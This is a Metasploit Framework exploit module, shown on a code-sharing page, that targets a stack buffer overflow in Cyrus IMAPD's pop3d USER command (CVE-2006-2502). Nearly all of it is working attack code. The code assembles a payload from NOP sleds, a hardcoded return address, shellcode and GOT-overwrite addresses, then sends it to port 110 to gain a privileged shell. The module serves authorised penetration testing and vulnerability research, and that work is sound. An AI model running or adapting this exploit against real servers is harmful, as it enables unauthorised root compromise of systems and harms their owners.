Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',

16
        'Description' => %q{

17
          This exploit takes advantage of a stack based overflow.  Once the stack

18
          corruption has occurred it is possible to overwrite a pointer which is

19
          later used for a memcpy. This gives us a write anything anywhere condition

20
          similar to a format string vulnerability.

21


22
          NOTE: The popsubfolders option is a non-default setting.

23


24
          I chose to overwrite the GOT with my shellcode and return to it. This

25
          defeats the VA random patch and possibly other stack protection features.

26


27
          Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with

28
          a version containing the vulnerable code, it is not exploitable due to the

29
          use of the FORTIFY_SOURCE compiler enhancement.

30
        },

31
        'Author' => [ 'bannedit', 'jduck' ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          [ 'CVE', '2006-2502' ],

35
          [ 'OSVDB', '25853' ],

36
          [ 'BID', '18056' ],

37
          [ 'EDB', '2053' ],

38
          [ 'EDB', '2185' ],

39
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],

40
        ],

41
        'Payload' => {

42
          'Space'	=> 250,

43
          'DisableNops' => true

44
        },

45
        'Platform'	=> 'linux',

46
        'Targets' => [

47
          # bannedit: 0x080fd204

48
          # K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)

49
          [ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],

50
        ],

51
        'Privileged'	=> true,

52
        'DisclosureDate'	=> '2006-05-21',

53
        'DefaultTarget'	=> 0,

54
        'Notes' => {

55
          'Stability' => [CRASH_SERVICE_DOWN],

56
          'SideEffects' => [IOC_IN_LOGS],

57
          'Reliability' => [UNRELIABLE_SESSION]

58
        }

59
      )

60
    )

61


62
    register_options([ Opt::RPORT(110) ])

63
  end

64


65
  def exploit

66
    connect

67
    banner = sock.get_once.to_s.strip

68


69
    print_status "Banner: #{banner}"

70


71
    # NOTE: orig poc shellcode len: 84

72


73
    # kcope: 352+84+86+4 (nops,sc,nops,ret)

74
    # K-sPecial: 84+(120*4) (sc,addrs)

75
    # bannedit: 265+8+250+29+16

76
    shellcode = payload.encoded

77


78
    buf = 'USER '

79
    buf << make_nops(265)

80
    # return address

81
    buf << [target.ret].pack('V') * 2

82
    buf << make_nops(250 - shellcode.length)

83
    buf << shellcode

84
    buf << make_nops(29)

85
    sc_addr = target.ret - 277

86
    buf << [sc_addr].pack('V') * 4

87
    buf << "\r\n"

88


89
    sock.send(buf, 0)

90
    disconnect

91
  end

92
end

93


94